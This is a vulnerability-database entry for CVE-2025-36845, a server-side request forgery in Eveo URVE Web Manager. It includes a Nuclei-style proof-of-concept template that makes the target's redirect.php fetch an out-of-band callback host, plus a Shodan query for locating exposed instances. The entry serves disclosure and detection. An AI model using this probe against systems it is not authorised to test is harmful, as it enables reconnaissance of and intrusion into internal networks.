漏洞描述
Eveo URVE Web Manager 27.02.2025 contains a server-side request forgery caused by improper validation of URL input in /_internal/redirect.php, letting attackers make requests to internal endpoints, exploit requires crafted URL input.
CVE-2025-36845: Eveo URVE Web Manager - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2025-36845
info:
name: Eveo URVE Web Manager - Server-Side Request Forgery
author: DhiyaneshDk
severity: high
description: |
Eveo URVE Web Manager 27.02.2025 contains a server-side request forgery caused by improper validation of URL input in /_internal/redirect.php, letting attackers make requests to internal endpoints, exploit requires crafted URL input.
impact: |
Attackers can make requests to internal-only accessible endpoints, potentially exposing sensitive internal services or data.
remediation: |
Update to the latest version with SSRF protections or apply input validation to restrict URL requests.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-035.txt
- https://smartoffice.expert/en
metadata:
verified: true
max-request: 1
shodan-query: html:"URVE Web Manager"
tags: cve,cve2025,eveo,ssrf,oast,oob
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/urve/site/login.html?lang=en"
matchers:
- type: dsl
dsl:
- "contains(body, 'URVE Web Manager')"
- "status_code == 200"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/_internal/redirect.php?url=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4b0a00483046022100e8485b0f6e12dfd30ac43130dd20d7059168912b2c8db99550e2d11f32affcfa022100e6d23f89bb6bd11e0a804607ad7b8e2f0048044b1edd544ad3bdc8b9b3311ace:922c64590222798bb761d5b6d8e72950